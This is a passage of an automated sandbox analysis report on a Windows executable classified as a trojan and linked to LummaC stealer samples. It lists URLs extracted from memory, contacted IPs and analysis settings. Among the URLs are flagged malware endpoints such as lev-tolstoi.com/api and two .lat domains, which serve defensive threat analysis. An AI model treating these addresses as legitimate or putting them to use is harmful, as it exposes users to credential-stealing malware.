https://lev-tolstoi.com/	Ebgl8jb6CW.exe, 00000000.00000003.1863000633.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875766412.0000000000C82000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop/	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sketchfab.com	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875627830.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com/	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/vo(A	Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875766412.0000000000C82000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/discussions/	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/stats/	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://medal.tv	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://broadcast.st.dl.eccdnx.com	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://talkynicer.lat:443/apii	Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875673200.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/workshop/	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.steampowered.com/	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/vo	Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875673200.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com:443/profiles/76561199724331900d	Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875673200.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/	Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://127.0.0.1:27060	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com:443/api	Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875673200.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.com/	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.steampowered.com/	Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/account/cookiepreferences/	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tentabatte.lat:443/api&	Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875673200.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/mobile	Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/	Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.157.254	lev-tolstoi.com	United States		13335	CLOUDFLARENETUS	false
23.55.153.106	steamcommunity.com	United States		20940	AKAMAI-ASN1EU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580873
Start date and time:	2024-12-26 12:44:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	1
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Ebgl8jb6CW.exe renamed because original name is a hash value
Original Sample Name:	f45c38f2402423aa924b4b40e8487483.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@11/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Excluded IPs from analysis (whitelisted): 52.149.20.212
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:45:09	API Interceptor	6x Sleep call for process: Ebgl8jb6CW.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.157.254	3zg6i6Zu1u.exe	Get hash	malicious	LummaC	Browse
	L5Kgf2Tvkc.exe	Get hash	malicious	LummaC	Browse
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse
	Bire1g8ahY.exe	Get hash	malicious	LummaC, Stealc	Browse
	NfwBtCx5PR.exe	Get hash	malicious	LummaC	Browse
	pJRiqnTih0.exe	Get hash	malicious	LummaC	Browse
	xxLuwS60RS.exe	Get hash	malicious	LummaC	Browse
	9pyUjy2elE.exe	Get hash	malicious	LummaC	Browse
	NQbg5Ht2hW.exe	Get hash	malicious	LummaC	Browse
	BZuk2UI1RC.exe	Get hash	malicious	LummaC	Browse
23.55.153.106	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse
	BootStrapper.exe	Get hash	malicious	LummaC	Browse
	Loader.exe	Get hash	malicious	LummaC	Browse
	Script.exe	Get hash	malicious	LummaC	Browse
	3zg6i6Zu1u.exe	Get hash	malicious	LummaC	Browse
	oiF7u78bY2.exe	Get hash	malicious	LummaC	Browse
	L5Kgf2Tvkc.exe	Get hash	malicious	LummaC	Browse
	jSFUzuYPG9.exe	Get hash	malicious	LummaC	Browse
	HK8IIasL9i.exe	Get hash	malicious	LummaC	Browse
	OGBLsboKIF.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lev-tolstoi.com	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	3zg6i6Zu1u.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	oiF7u78bY2.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	L5Kgf2Tvkc.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	172.67.157.254
	LNn56KMkEE.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	BVGvbpplT8.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.66.86
	mgEXk8ip26.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	Bire1g8ahY.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.157.254
	jSFUzuYPG9.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
steamcommunity.com	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	BootStrapper.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Loader.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
